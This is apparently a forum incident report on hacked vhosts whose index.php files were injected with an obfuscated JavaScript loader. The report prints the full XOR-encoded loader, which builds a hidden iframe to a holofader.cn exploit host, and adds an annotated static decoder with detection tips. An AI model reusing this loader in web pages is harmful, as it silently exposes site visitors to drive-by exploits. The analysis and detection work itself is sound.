asotsiaal
Level 7

Beware: pdf/swf exploit - server used holofader.cn

Forensics team - please investigate!

I found that several vhosts on my LAMP server had been hacked. All index.php files had the following script appended (included below).

My personal (honeypot) PC (with IE8) resolved the hash and made an automatic query to the following addresses:

hxxp://holofader.cn/3/moreBook.swf
hxxp://holofader.cn/3/sByBook.pdf

Possibly the PC is already compromised.

---------

<script>
// The payload is stored as an integer array; XORing each element with 70 yields one
// character of the real script. Elements are grouped here by the statement they decode
// to, with that statement noted above each group. Values are unchanged from the sample.
zcsgwzlawtk=new Array(
// document.write("<body><script>
34,41,37,51,43,35,40,50,104,49,52,47,50,35,110,100,122,36,41,34,63,120,122,53,37,52,47,54,50,120,
// var brcqmxewvo='fr';
48,39,52,102,36,52,37,55,43,62,35,49,48,41,123,97,32,52,97,125,
// var gvimklbaru='i';
48,39,52,102,33,48,47,43,45,42,36,39,52,51,123,97,47,97,125,
// var cnyvzlsdwtu='me';
48,39,52,102,37,40,63,48,60,42,53,34,49,50,51,123,97,43,35,97,125,
// var khwoerdqyyy='a';
48,39,52,102,45,46,49,41,35,52,34,55,63,63,63,123,97,39,97,125,
// var ikljbfgdte=document;
48,39,52,102,47,45,42,44,36,32,33,34,50,35,123,34,41,37,51,43,35,40,50,125,
// var sqrvnkqmuxi='width';
48,39,52,102,53,55,52,48,40,45,55,43,51,62,47,123,97,49,47,34,50,46,97,125,
// var bamrykqjta='http://holofader.cn/3/index.php';
48,39,52,102,36,39,43,52,63,45,55,44,50,39,123,97,46,50,50,54,124,105,105,46,41,42,41,32,39,34,35,52,104,37,40,105,117,105,47,40,34,35,62,104,54,46,54,97,125,
// var dcajgtofmew='height';
48,39,52,102,34,37,39,44,33,50,41,32,43,35,49,123,97,46,35,47,33,46,50,97,125,
// var rhxebumlwn='style';
48,39,52,102,52,46,62,35,36,51,43,42,49,40,123,97,53,50,63,42,35,97,125,
// var nmidvceqfgr='1';
48,39,52,102,40,43,47,34,48,37,35,55,32,33,52,123,97,119,97,125,
// var mlcrxhoeyvc='display:none';
48,39,52,102,43,42,37,52,62,46,41,35,63,48,37,123,97,34,47,53,54,42,39,63,124,40,41,40,35,97,125,
// var xxpitdggpo='src';
48,39,52,102,62,62,54,47,50,34,33,33,54,41,123,97,53,52,37,97,125,
// var lqocvvukif=ikljbfgdte.createElement(gvimklbaru+brcqmxewvo+khwoerdqyyy+cnyvzlsdwtu);  ('i'+'fr'+'a'+'me')
48,39,52,102,42,55,41,37,48,48,51,45,47,32,123,47,45,42,44,36,32,33,34,50,35,104,37,52,35,39,50,35,3,42,35,43,35,40,50,110,33,48,47,43,45,42,36,39,52,51,109,36,52,37,55,43,62,35,49,48,41,109,45,46,49,41,35,52,34,55,63,63,63,109,37,40,63,48,60,42,53,34,49,50,51,111,125,
// lqocvvukif.setAttribute(sqrvnkqmuxi,nmidvceqfgr);  (width=1)
42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,53,55,52,48,40,45,55,43,51,62,47,106,40,43,47,34,48,37,35,55,32,33,52,111,125,
// lqocvvukif.setAttribute(dcajgtofmew,nmidvceqfgr);  (height=1)
42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,34,37,39,44,33,50,41,32,43,35,49,106,40,43,47,34,48,37,35,55,32,33,52,111,125,
// lqocvvukif.setAttribute(rhxebumlwn,mlcrxhoeyvc);  (style=display:none)
42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,52,46,62,35,36,51,43,42,49,40,106,43,42,37,52,62,46,41,35,63,48,37,111,125,
// lqocvvukif.setAttribute(xxpitdggpo,bamrykqjta);  (src=the holofader.cn URL)
42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,62,62,54,47,50,34,33,33,54,41,106,36,39,43,52,63,45,55,44,50,39,111,125,
// ikljbfgdte.body.appendChild(lqocvvukif); followed by the closing script tag and the end of the write() call
47,45,42,44,36,32,33,34,50,35,104,36,41,34,63,104,39,54,54,35,40,34,5,46,47,42,34,110,42,55,41,37,48,48,51,45,47,32,111,125,122,105,53,37,52,47,54,50,120,100,111
);
cxpexelvhw="";                   // decoded payload accumulates here
ghaceffafi=70;                   // XOR key
lerxenrpuun=eval;                // eval aliased to dodge simple signature matches
ykokgwgpdo=String.fromCharCode;  // likewise for String.fromCharCode
for(ftwktbslnxd in zcsgwzlawtk)cxpexelvhw+=ykokgwgpdo(zcsgwzlawtk[ftwktbslnxd]^ghaceffafi);
lerxenrpuun(cxpexelvhw);         // runs the decoded payload: a hidden 1x1 iframe pointing at holofader.cn
</script>

--------------------

Message was edited by: Samantha Price - editing links for the protection of other users. on 1/16/10 6:43:11 AM CST
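The loader above decodes its payload by XORing every array element with 70 and handing the result to eval. The following is an added example (not code from the post or from the poster): it repeats that decode step statically in Node.js, with no eval, so the payload can be read instead of run; it also brute-forces the single-byte key for variants that do not store it in the clear, and pulls URLs out of the result for blocklisting. SAMPLE_ARRAY is the integer array copied from the posted script; the marker list, the scoring heuristic and the function names are my own choices, not anything the sample defines.

```javascript
// Added example: static decoder for the XOR-obfuscated loader in the post.
// Repeats the loader's decode step without eval, ranks candidate keys, and
// extracts URLs and DOM behaviour from the decoded text. Run with: node decode.js

// Integer array copied verbatim from the posted script (variable zcsgwzlawtk).
const SAMPLE_ARRAY = [
  34,41,37,51,43,35,40,50,104,49,52,47,50,35,110,100,122,36,41,34,63,120,122,53,37,52,47,54,50,120,
  48,39,52,102,36,52,37,55,43,62,35,49,48,41,123,97,32,52,97,125,
  48,39,52,102,33,48,47,43,45,42,36,39,52,51,123,97,47,97,125,
  48,39,52,102,37,40,63,48,60,42,53,34,49,50,51,123,97,43,35,97,125,
  48,39,52,102,45,46,49,41,35,52,34,55,63,63,63,123,97,39,97,125,
  48,39,52,102,47,45,42,44,36,32,33,34,50,35,123,34,41,37,51,43,35,40,50,125,
  48,39,52,102,53,55,52,48,40,45,55,43,51,62,47,123,97,49,47,34,50,46,97,125,
  48,39,52,102,36,39,43,52,63,45,55,44,50,39,123,97,46,50,50,54,124,105,105,46,41,42,41,32,39,34,35,52,104,
  37,40,105,117,105,47,40,34,35,62,104,54,46,54,97,125,
  48,39,52,102,34,37,39,44,33,50,41,32,43,35,49,123,97,46,35,47,33,46,50,97,125,
  48,39,52,102,52,46,62,35,36,51,43,42,49,40,123,97,53,50,63,42,35,97,125,
  48,39,52,102,40,43,47,34,48,37,35,55,32,33,52,123,97,119,97,125,
  48,39,52,102,43,42,37,52,62,46,41,35,63,48,37,123,97,34,47,53,54,42,39,63,124,40,41,40,35,97,125,
  48,39,52,102,62,62,54,47,50,34,33,33,54,41,123,97,53,52,37,97,125,
  48,39,52,102,42,55,41,37,48,48,51,45,47,32,123,47,45,42,44,36,32,33,34,50,35,104,37,52,35,39,50,35,3,42,35,43,35,40,50,110,
  33,48,47,43,45,42,36,39,52,51,109,36,52,37,55,43,62,35,49,48,41,109,45,46,49,41,35,52,34,55,63,63,63,109,37,40,63,48,60,42,53,34,49,50,51,111,125,
  42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,53,55,52,48,40,45,55,43,51,62,47,106,40,43,47,34,48,37,35,55,32,33,52,111,125,
  42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,34,37,39,44,33,50,41,32,43,35,49,106,40,43,47,34,48,37,35,55,32,33,52,111,125,
  42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,52,46,62,35,36,51,43,42,49,40,106,43,42,37,52,62,46,41,35,63,48,37,111,125,
  42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,62,62,54,47,50,34,33,33,54,41,106,36,39,43,52,63,45,55,44,50,39,111,125,
  47,45,42,44,36,32,33,34,50,35,104,36,41,34,63,104,39,54,54,35,40,34,5,46,47,42,34,110,42,55,41,37,48,48,51,45,47,32,111,125,122,105,53,37,52,47,54,50,120,100,111,
];

// Same arithmetic as the loader's for-loop: one character per element, no eval.
function decodeXorArray(nums, key) {
  return nums.map((n) => String.fromCharCode(n ^ key)).join("");
}

// Heuristic (my choice, not from the post): how much does a candidate decoding
// look like a JavaScript dropper? Count typical tokens, penalise non-printables.
const JS_MARKERS = ["document", "var ", "script", "http", "eval", "unescape", "iframe", "createElement"];

function scoreAsJavaScript(text) {
  let score = 0;
  for (const marker of JS_MARKERS) score += text.split(marker).length - 1;
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    const printable = (c >= 32 && c <= 126) || c === 9 || c === 10 || c === 13;
    if (!printable) score -= 1;
  }
  return score;
}

// Brute-force a single-byte XOR key. This sample stores its key in the clear
// (ghaceffafi=70); variants that hide or compute it still fall to 256 trials.
function findXorKey(nums) {
  let bestKey = -1;
  let bestScore = -Infinity;
  for (let key = 0; key < 256; key++) {
    const score = scoreAsJavaScript(decodeXorArray(nums, key));
    if (score > bestScore) { bestScore = score; bestKey = key; }
  }
  return bestKey;
}

// URLs worth blocklisting or pivoting on, taken from the decoded text.
function extractUrls(text) {
  return text.match(/https?:\/\/[^'"\s()<>]+/g) || [];
}

// What the decoded payload does to the DOM, judged from the calls it contains.
function summarise(text) {
  return {
    writesMarkup: /document\.write\s*\(/.test(text),
    createsElement: /\.createElement\s*\(/.test(text),
    appendsNode: /\.appendChild\s*\(/.test(text),
    hiddenStyle: /display\s*:\s*none/.test(text),
    // The tag name is assembled from 'i'+'fr'+'a'+'me', so the literal never
    // appears; a grep for "iframe" on the decoded text would miss this sample.
    literalIframe: /iframe/i.test(text),
  };
}

function analyseSample() {
  const key = findXorKey(SAMPLE_ARRAY);
  const decoded = decodeXorArray(SAMPLE_ARRAY, key);
  return { key, decoded, urls: extractUrls(decoded), ...summarise(decoded) };
}

const report = analyseSample();
console.log("XOR key:", report.key);
console.log("URLs:", report.urls);
console.log("DOM behaviour:", summarise(report.decoded));
console.log("Decoded payload:\n" + report.decoded);
```

Running it recovers the key 70 and a payload that does document.write of an inner script building a 1x1, display:none element whose src is hxxp://holofader.cn/3/index.php, then appends it to document.body. Two details matter for detection: the element name is concatenated from fragments at runtime, so neither the obfuscated nor the decoded text contains the string "iframe", and eval and String.fromCharCode are reached through aliases, so a rule that only looks for "eval(" on the injected line will not fire. Scanning index.php files for "new Array(" followed by a long run of small integers and a "^" in a for-in loop is a more robust indicator for this family of injection.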